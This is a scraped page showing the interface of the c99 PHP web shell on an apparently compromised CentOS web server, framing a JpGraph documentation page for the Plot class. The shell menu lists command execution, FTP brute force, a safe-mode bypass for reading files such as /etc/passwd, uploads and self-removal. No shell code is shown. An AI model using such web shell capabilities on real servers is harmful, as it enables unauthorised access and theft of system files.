!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Plot.html (10.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS Plot
(Defined in: jpgraph.php : 8011)
 Plot 
 HideLegend() 
 SetCenter() 
 SetColor() 
 SetCSIMTargets() 
 SetLegend() 
 SetLineWeight() 
 

Class usage and Overview
Abstract base class for all plots. This abstract base class defines the signature that all plots must adhere to. It also provides the default trivial implementation for these framework methods. Public properties:
Name Type Description
value DisplayValue Control the data value displayed at each data point

 

See also related classes:
DisplayValue, LinePlot, ErrorPlot and ScatterPlot

 


Class Methods

 

 

Hide legend for this plot

ArgumentDefaultDescription
$f true TRUE=Hide legend

Description
Hide legend for this plot even if it was specified (with SetLegend() )  

Example

$bar = new GanttBar(...);
$bar->HideLegend();

 

 

Center the data pointr between tick labels

ArgumentDefaultDescription
$aCenter true True=Center each data point

Description
Used for text scales. Centers the data values between the ticvk marks instead if falling exactly on them.  

Example

$barplot->SetCenter();

 

 

Specify color for plot.

ArgumentDefaultDescription
$aColor  Color

Description
Specify color for plot. Each plot type is free to interpret it to its own choosing. 

Example

$lineplot->SetColor('red');

 

 

Set URL targets for CSIM

ArgumentDefaultDescription
$aTargets  Array of URL targets
$aAlts null Alt texts for each CSIM point

Description
Set the URL links for the CSIM if the plot type support this. 

Example

$url1 = "http://someotherurl.html"
$url2 = ..
...

$targetarray = array($url1, $url2, $url3, $url4);
$barplot->SetCSIMTargets($targetarray);

 

 

Set legend string for this plot

ArgumentDefaultDescription
$aLegend  Legend string
$aCSIM "" URL for image map
$aCSIMAlt "" Alt text for image map

Description
Set legend string for this plot. If the CSIM string is epscified then the legend will become an image map. To use image maps you need to use the StrokeCSIM() instead of the normal Stroke() 
 
See also
Graph::StrokeCSIM

Example

$lineplot->SetLegend('Year 2002');

 

 

Specify line weight for plot

ArgumentDefaultDescription
$aWeight 1 Line weight in pixels

Description
Specify line weight for plot 

Example

$lineplot->SetWeight(2);



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--